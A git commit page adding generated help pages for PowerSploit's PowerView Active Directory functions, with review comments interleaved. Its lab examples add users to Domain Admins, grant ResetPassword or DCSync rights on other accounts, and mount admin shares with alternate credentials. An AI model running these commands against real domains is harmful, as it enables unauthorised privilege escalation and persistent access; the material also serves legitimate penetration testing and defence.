| author | HarmJ0y <will@harmj0y.net> | 2016-12-12 21:05:08 -0500 |
|---|---|---|
| committer | HarmJ0y <will@harmj0y.net> | 2016-12-12 21:05:08 -0500 |
| commit | 0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809 (patch) | |
| tree | ed420fc412380726daa10675fe1d0407d76b429c /docs | |
| parent | 7f10db78277a6e6ac9c9c8c85b81bc4847042d78 (diff) | |
| download | PowerSploit-0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809.tar.gz PowerSploit-0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809.zip | |
first take at platyPS doc generation
Diffstat (limited to 'docs')
77 files changed, 15823 insertions, 0 deletions
diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md new file mode 100755 index 0000000..cc563e9 --- /dev/null +++ b/docs/Recon/Add-DomainGroupMember.md @@ -0,0 +1,142 @@ +# Add-DomainGroupMember
+
+## SYNOPSIS
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object.
+For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
+```
+
+Adds harmj0y to 'Domain Admins' in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
+
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -Identity
+A group SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GroupName, GroupIdentity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Members
+One or more member identities, i.e.
+SamAccountName (e.g.
+Group1), DistinguishedName
+(e.g.
+CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: MemberIdentity, Member, DistinguishedName
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
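Review bot: the DESCRIPTION refers to `-GroupIdentity` ("search for the specified -GroupIdentity"), but the parameter is `-Identity`; GroupIdentity is only one of its aliases (`Aliases: GroupName, GroupIdentity`), so the description should use the parameter name. In EXAMPLE 2 and EXAMPLE 3 the generated code fence closes after the first `$SecPassword = ...` line, leaving the `$Cred = New-Object ...` line and the `Add-DomainGroupMember ...` invocation as unfenced prose; the whole example belongs inside one fence. EXAMPLE 3's explanation says the user is created "with the specified description and password", but the command passes no description. INPUTS and OUTPUTS are empty even though -Members accepts pipeline input (ByPropertyName, ByValue), which is exactly what EXAMPLE 3 relies on.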
diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md new file mode 100755 index 0000000..c530e81 --- /dev/null +++ b/docs/Recon/Add-DomainObjectAcl.md @@ -0,0 +1,361 @@ +# Add-DomainObjectAcl
+
+## SYNOPSIS
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Add-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]
+ [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]
+```
+
+## DESCRIPTION
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity.
+Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID.
+These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+...
+
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+\[no results returned\]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+## PARAMETERS
+
+### -TargetIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -TargetDomain
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetLDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetSearchBase
+The LDAP source to search through for targets, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalDomain
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Rights
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsGUID
+Manual GUID representing the right to add to the target.
+
+```yaml
+Type: Guid
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell)
+
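Review bot: the -TargetIdentity prose says "Required." and "Wildcards accepted." while its metadata says `Required: False` and `Accept wildcard characters: False`; the SYNTAX line also marks it optional (`[[-TargetIdentity] <String[]>]`, since -TargetLDAPFilter is the alternative), so the prose is what needs correcting, and the same "Wildcards accepted." contradiction appears under -PrincipalIdentity. The -PrincipalDomain description was copied from -TargetDomain ("Specifies the domain for the TargetIdentity to use for the principal") and should name PrincipalIdentity. -ServerTimeLimit says "Default of 120 seconds." but the metadata says `Default value: 0`; one of them is wrong. EXAMPLE 2's closing verification output still lists `ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local` although the target was testuser, so it appears pasted from EXAMPLE 1, and the two preceding VERBOSE lines disagree on the target DN (one says `CN=testuser testuser,...`, the other `CN=testuser,...`). In RELATED LINKS the two URLs are fused into a single markdown link whose text and target each contain both addresses; split them into two links. The EXAMPLE 1 and EXAMPLE 2 fences also close after the first line, leaving the rest of each transcript unfenced.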
diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md new file mode 100755 index 0000000..86112e2 --- /dev/null +++ b/docs/Recon/Add-RemoteConnection.md @@ -0,0 +1,114 @@ +# Add-RemoteConnection
+
+## SYNOPSIS
+Pseudo "mounts" a connection to a remote path using the specified
+credential object, allowing for access of remote resources.
+If a -Path isn't
+specified, a -ComputerName is required to pseudo-mount IPC$.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Add-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>
+```
+
+### Path
+```
+Add-RemoteConnection [-Path] <String[]> -Credential <PSCredential>
+```
+
+## DESCRIPTION
+This function uses WNetAddConnection2W to make a 'temporary' (i.e.
+not saved) connection
+to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the
+-Credential object.
+If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
+
+To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path
+or -ComputerName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Cred = Get-Credential
+```
+
+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$Cred = Get-Credential
+```
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to add a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to add the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
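Review bot: EXAMPLE 2 and EXAMPLE 3 have the fence problem seen on the other generated pages: the fence closes after the first line, so `Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred` renders as prose with markdown-escaped backslashes instead of as copyable code. INPUTS is empty although -ComputerName accepts pipeline input (ByPropertyName, ByValue), as EXAMPLE 3 demonstrates. The DESCRIPTION names Remove-RemoteConnection as the only way to destroy a connection made with the supplied alternate credentials, so RELATED LINKS (currently empty) should link that page; a reader who reaches this page should find the teardown step as easily as the setup step.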
diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md new file mode 100755 index 0000000..7f9f42b --- /dev/null +++ b/docs/Recon/Convert-ADName.md @@ -0,0 +1,184 @@ +# Convert-ADName
+
+## SYNOPSIS
+Converts Active Directory object names between a variety of formats.
+
+Author: Bill Stewart, Pasquale Lantella
+Modifications: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Convert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
+and translates Active Directory names between various formats using the NameTranslate COM object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Convert-ADName -Identity "TESTLAB\harmj0y"
+```
+
+harmj0y@testlab.local
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
+```
+
+testlab.local/Users/krbtgt
+testlab.local/Users/Administrator
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
+```
+
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
+
+TESTLAB\harmj0y
+
+## PARAMETERS
+
+### -Identity
+Specifies the Active Directory object name to translate, of the following form:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+ SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, ObjectName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputType
+Specifies the output name type you want to convert to, which must be one of the following:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format, e.g.
+'fabrikam.com/Users/Phineas Flynn'
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more objects name strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+Outputs a string representing the converted name.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67)
+
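Review bot: EXAMPLE 4 misspells the cmdlet as `Convert-ADNAme`; use the name given in the page title, Convert-ADName. The DESCRIPTION points the reader to the sources "(in LINK)", but RELATED LINKS fuses the two reference URLs into one markdown link whose text and target both contain both URLs, so neither resolves; split them. The format tables under -Identity and -OutputType lost their column alignment where platyPS wrapped after "e.g." (`Display display name, e.g.` followed by `'pflynn'` on its own line), so several rows now read as broken list items; the CanonicalEx row under -Identity also lacks the example that the -OutputType table gives it, and "of the following form" should be "forms". EXAMPLE 4's fence closes after the first line, leaving the `$Cred` construction and the piped conversion unfenced.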
diff --git a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md new file mode 100755 index 0000000..186e19b --- /dev/null +++ b/docs/Recon/ConvertFrom-SID.md @@ -0,0 +1,126 @@ +# ConvertFrom-SID
+
+## SYNOPSIS
+Converts a security identifier (SID) to a group/user name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName
+
+## SYNTAX
+
+```
+ConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a security identifier string (SID) to a group/user name
+using Convert-ADName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
+```
+
+TESTLAB\harmj0y
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
+```
+
+TESTLAB\WINDOWS2$
+TESTLAB\harmj0y
+BUILTIN\Distributed COM Users
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
+
+TESTLAB\harmj0y
+
+## PARAMETERS
+
+### -ObjectSid
+Specifies one or more SIDs to convert.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SID
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SID strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+The converted DOMAIN\username.
+
+## NOTES
+
+## RELATED LINKS
+
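Review bot: EXAMPLE 3's fence again closes after `$SecPassword = ...`, leaving the credential construction and the `ConvertFrom-SID ... -Credential $Cred` call unfenced. The page never states what is returned when a SID does not resolve; since the function is documented as a wrapper over Convert-ADName and EXAMPLE 2 mixes domain SIDs with the well-known `S-1-5-32-562`, a sentence in NOTES on the failure behaviour (no output, the SID echoed back, or an error) would help callers that filter on the result. RELATED LINKS is empty; at minimum link Convert-ADName, the listed dependency.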
diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md new file mode 100755 index 0000000..c75f942 --- /dev/null +++ b/docs/Recon/ConvertFrom-UACValue.md @@ -0,0 +1,127 @@ +# ConvertFrom-UACValue
+
+## SYNOPSIS
+Converts a UAC int value to human readable form.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+ConvertFrom-UACValue [-Value] <Int32> [-ShowAll]
+```
+
+## DESCRIPTION
+This function will take an integer that represents a User Account
+Control (UAC) binary blob and will covert it to an ordered
+dictionary with each bitwise value broken out.
+By default only values
+set are displayed- the -ShowAll switch will display all values with
+a + next to the ones set.
